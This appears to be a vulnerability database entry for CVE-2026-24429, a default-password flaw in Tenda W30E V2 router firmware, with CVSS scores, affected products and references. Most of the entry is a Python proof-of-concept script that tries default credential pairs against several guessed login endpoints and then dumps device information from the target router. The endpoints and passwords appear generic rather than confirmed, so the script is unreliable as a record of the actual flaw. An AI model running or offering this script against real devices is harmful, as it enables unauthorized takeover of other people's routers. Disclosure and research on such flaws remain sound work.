Security Vulnerability Report
CVE-2026-24429 CVSS 9.8 CRITICAL


Published: 2026-01-26 18:16:40
Last Modified: 2026-01-29 13:01:22

Description

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage these default credentials to gain authenticated access to the management interface.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Score (secondary)
9.3 CRITICAL
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Configurations (Affected Products)

cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:w30e:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda W30E V2 firmware versions <= V16.01.0.19(5037)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-24429 - Tenda W30E V2 Hardcoded Default Password PoC

This PoC demonstrates authentication bypass using hardcoded default credentials.
WARNING: For authorized security testing only.
"""
import sys
from urllib.parse import urljoin

import requests


def exploit_tenda_default_credentials(target_ip, default_user="admin", default_pass="password"):
    """
    Attempt to authenticate to Tenda W30E V2 using hardcoded default credentials.

    Args:
        target_ip: Target router IP address
        default_user: Default username (typically 'admin')
        default_pass: Default password (often blank or 'password')

    Returns:
        bool: True if authentication successful, False otherwise
    """
    target_url = f"http://{target_ip}"

    # Common Tenda W30E V2 authentication endpoints
    auth_endpoints = [
        "/login/Auth",
        "/cgi-bin/login.cgi",
        "/admin/login.cgi",
        "/api/system/login",
    ]

    # Authentication payloads (may vary by firmware version)
    auth_payloads = [
        {"username": default_user, "password": default_pass},
        {"username": default_user, "password": ""},
        {"username": "admin", "password": "admin"},
        {"user": default_user, "pass": default_pass},
    ]

    for endpoint in auth_endpoints:
        for payload in auth_payloads:
            try:
                response = requests.post(
                    urljoin(target_url, endpoint),
                    data=payload,
                    timeout=10,
                    verify=False,
                )
                # Check for successful authentication indicators
                if response.status_code == 200:
                    body = response.text.lower()
                    if "success" in body or "token" in body:
                        print(f"[+] SUCCESS: Authenticated via {endpoint}")
                        print(f"[+] Payload used: {payload}")
                        print(f"[+] Response: {response.text[:200]}")
                        return True
                    # Try to extract session cookie/token
                    if response.cookies:
                        print(f"[*] Received cookies from {endpoint}: {response.cookies}")
                        return True
            except requests.exceptions.RequestException as e:
                print(f"[-] Error accessing {endpoint}: {e}")
                continue

    print("[-] Failed to authenticate with default credentials")
    return False


def check_device_info(target_ip):
    """Check device information after successful authentication."""
    endpoints = [
        "/cgi-bin/DevInfoShow",
        "/api/system/deviceinfo",
        "/cgi-bin/StatusLan",
    ]
    for endpoint in endpoints:
        try:
            response = requests.get(urljoin(f"http://{target_ip}", endpoint), timeout=10)
            if response.status_code == 200:
                print(f"\n[+] Device info from {endpoint}:")
                print(response.text)
        except requests.exceptions.RequestException:
            continue


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-24429.py <target_ip>")
        print("Example: python cve-2026-24429.py 192.168.0.1")
        sys.exit(1)

    target = sys.argv[1]
    print(f"[*] Target: {target}")
    print("[*] Exploiting CVE-2026-24429: Tenda W30E V2 Hardcoded Default Password\n")

    if exploit_tenda_default_credentials(target):
        print("\n[*] Extracting device information...")
        check_device_info(target)
```

Weakness

CWE-1393 (Use of Default Password)

References

https://www.tendacn.com/product/W30E (Product)
https://www.vulncheck.com/advisories/tenda-w30e-v2-hardcoded-default-password-for-built-in-account (Third Party Advisory)